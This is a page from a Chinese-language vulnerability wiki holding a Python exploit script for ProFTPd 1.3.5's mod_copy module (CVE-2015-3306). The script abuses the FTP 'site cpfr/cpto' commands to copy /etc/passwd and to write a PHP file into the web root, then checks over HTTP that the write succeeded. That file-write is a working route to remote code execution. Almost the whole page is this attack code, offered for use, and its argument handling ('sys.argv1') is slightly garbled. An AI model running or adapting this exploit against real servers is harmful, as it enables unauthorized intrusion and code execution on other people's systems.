免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
EXP
# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) # Date: 25/05/2021 # Exploit Author: Shellbr3ak # Version: 1.3.5 # Tested on: Ubuntu 16.04.6 LTS # CVE : CVE-2015-3306 #!/usr/bin/env python3 import sys import socket import requests def exploit(client, target): client.connect((target,21)) # Connecting to the target server banner = client.recv(74) print(banner.decode()) client.send(b'site cpfr /etc/passwd\r\n') print(client.recv(1024).decode()) client.send(b'site cpto <?php phpinfo(); ?>\r\n') # phpinfo() is just a PoC. print(client.recv(1024).decode()) client.send(b'site cpfr /proc/self/fd/3\r\n') print(client.recv(1024).decode()) client.send(b'site cpto /var/www/html/test.php\r\n') print(client.recv(1024).decode()) client.close() print('Exploit Completed') def check(url): req = requests.get(url) # Requesting the written PoC php file via HTTP if req.status_code == 200: print('+ File Written Successfully') print(f'+ Go to : {url}') else: print('! Something Went Wrong') print('! Directory might not be writable') def main(): client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) target = sys.argv1 exploit(client, target) url = 'http://' + target + '/test.php' check(url) if __name__ == '__main__': main()
PWNWIK.COM